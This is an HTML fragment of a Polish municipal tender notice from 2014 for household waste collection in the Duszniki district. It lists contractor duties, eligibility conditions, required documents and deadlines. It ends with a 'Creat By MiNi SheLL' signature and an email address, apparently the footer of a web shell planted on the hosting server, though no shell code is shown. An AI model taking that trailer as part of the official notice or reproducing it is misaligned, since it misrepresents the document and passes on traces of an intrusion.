p)	Wykonawca w okresie obowiązywania umowy zobowiązany jest ograniczyć masę odpadów komunalnych ulegających biodegradacji  przekazywanych do składowania do wysokości określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 25 maja 2012 roku w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz.U. z 2012 roku poz. 676).
r) Wykonawca zgodnie z art. 9 lit. n ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2013 roku poz. 1399 ze zm.) zobowiązany jest do sporządzania kwartalnych sprawozdań i przekazywania ich Wójtowi Gminy Duszniki w terminie do końca miesiąca następującego po kwartale, którego dotyczy wraz z dokumentami sporządzonymi na potrzeby ewidencji odpadów oraz dokumentami potwierdzającymi osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania. Sprawozdania te przygotowywane powinny być zgodnie z wzorem wskazanym w Rozporządzeniu. Sprawozdanie należy przekazać w formie pisemnej oraz elektronicznej. 
s) W przypadku stwierdzenia, ze usługi wykonywane są niezgodnie z obowiązującymi przepisami prawa Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
t) Obowiązkiem Wykonawcy będzie odbieranie odpadów komunalnych od wszystkich właścicieli nieruchomości zamieszkałych położonych na terenie gminy Duszniki. Usługa obejmuje zapewnienie przez Wykonawcę dojazdu do punktów trudno dostępnych (szczególnie zimą i w okresie wzmożonych opadów deszczu i śniegu) poprzez zorganizowanie środków transportu, które umożliwią odbiór odpadów z punktów adresowych o problematycznej lokalizacji. Zamawiający w cz. II pkt. 6 wskazuje minimalne wyposażenie techniczne Wykonawcy oraz podaje minimalne ilości posiadanych pojazdów. Z uwagi na specyfikę Gminy ważne jest aby Wykonawca zabezpieczył dodatkowy sprzęt umożliwiający dotarcie w trudno dostępne miejsca. Istotna ze strony Zamawiającego jest gwarancja ze strony Wykonawcy świadczenia usług w sposób należyty. W przypadku niemożności dotarcia do najbardziej kłopotliwych nieruchomości np. z powodu zasp śnieżnych, w przypadku uznania okoliczności jako w pełni uzasadnionej fakt nieodebrania odpadów nie będzie uznany za niewłaściwe wykonanie umowy. O zaistniałej sytuacji należy jednak powiadomić właściciela nieruchomości, do której dojazd okaże się niemożliwy (po konsultacji z Zamawiającym).
u) Wykonawca zobowiązany jest do realizacji przedmiotu umowy przy zachowaniu należytej staranności zgodnie z przepisami prawa w szczególności zapisanymi w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  w wysokości 20.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest prowadzenie działalności w zakresie gospodarki odpadami, 
posiadanie aktualnego zaświadczenia o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Duszniki, oraz aktualnego zezwolenia na transport odpadów obejmującego Gminę Duszniki,

Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem : spełnia lub nie spełnia, w oparciu o wymagane  dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał usługi polegające na świadczeniu usług odbioru odpadów komunalnych  od mieszkańców  przez okres  co najmniej 2 lat wraz z podaniem ich wartości, przedmiotu , dat wykonywania oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie-  wykaz wg wzoru w SIWZ.

Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem : spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca wykaże , iż będzie dysponował  co najmniej :
a)	dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych i pozostałości z segregacji odpadów (śmieciarki),
b)	dwoma  pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
c)	jednym  pojazdem do odbierania odpadów bez frakcji kompaktującej.
- wykaz wg wzoru w SIWZ

Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem : spełnia lub nie spełnia, w oparciu o wymagane oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dostarczania żadnych dokumentów -Wykonawca składa oświadczenie wg wzoru w SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dostarczania żadnych dokumentów -Wykonawca składa oświadczenie wg wzoru w SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zostały określone w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany w umowie mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takich zmian i będą one dopuszczalne wyłącznie w granicach unormowania art. 144 ustawy Prawo zamówień Publicznych.
	Zamawiający dopuszcza możliwość zmiany ustaleń w umowie w następujących przypadkach:
-	zmiany wynagrodzenia, jeżeli nastąpi zmiana kosztów zewnętrznych będących podstawą kalkulacji ceny ofertowej, tj. nastąpi zmiana wysokości podatku VAT, 	nastąpi znacząca zmiana ceny paliw, powyżej 25 proc. ceny w dacie składania oferty, nastąpi znacząca zmiana ilości gospodarstw domowych, z których odbierane będą odpady komunalne - zmiana powyżej 15 proc. w stosunku do ilości przyjętej w specyfikacji istotnych warunków zamówienia.
-	zmiany w zakresie sposobu realizacji umowy w przypadku zmiany przepisów prawa, wpływających na sposób realizacji umowy, w tym zmiany przepisów prawa lokalnego np. regulaminu utrzymania czystości i porządku.
	W przypadku zaistnienia okoliczności wskazanych w ust. 2 pkt a umowy może nastąpić wzrost lub obniżenie wynagrodzenia Wykonawcy, przy czym zwiększenie wynagrodzenia jest dopuszczalne tylko w wysokości udokumentowanego wzrostu kosztów świadczenia usługi.
	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Katalog ten stanowi podstawy roszczenia dla Wykonawcy o zobowiązanie Zamawiającego do wyrażenia takiej zgody.
	Zmiany mogą być wprowadzonego po złożeniu pisemnej propozycji zmian, jeżeli konieczność ich wprowadzenia do umowy wynika ze zmiany prawa powszechnie obowiązującego, na terenie Rzeczpospolitej Polskiej np. prawa podatkowego lub wynika ze zmiany okoliczności, której nie można było przewidzieć w chwili zawarcia umowy.
Nie stanowi zmiany umowy, w rozumieniu art. 144 ustawy Prawo zamówień publicznych zmiana osób reprezentujących strony</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.duszniki.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Duszniki, ul. Sportowa 1, 64-550 Duszniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2014 godzina 12:00, miejsce: Urząd Gminy Duszniki, ul. Sportowa 1, 64-550 Duszniki, Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com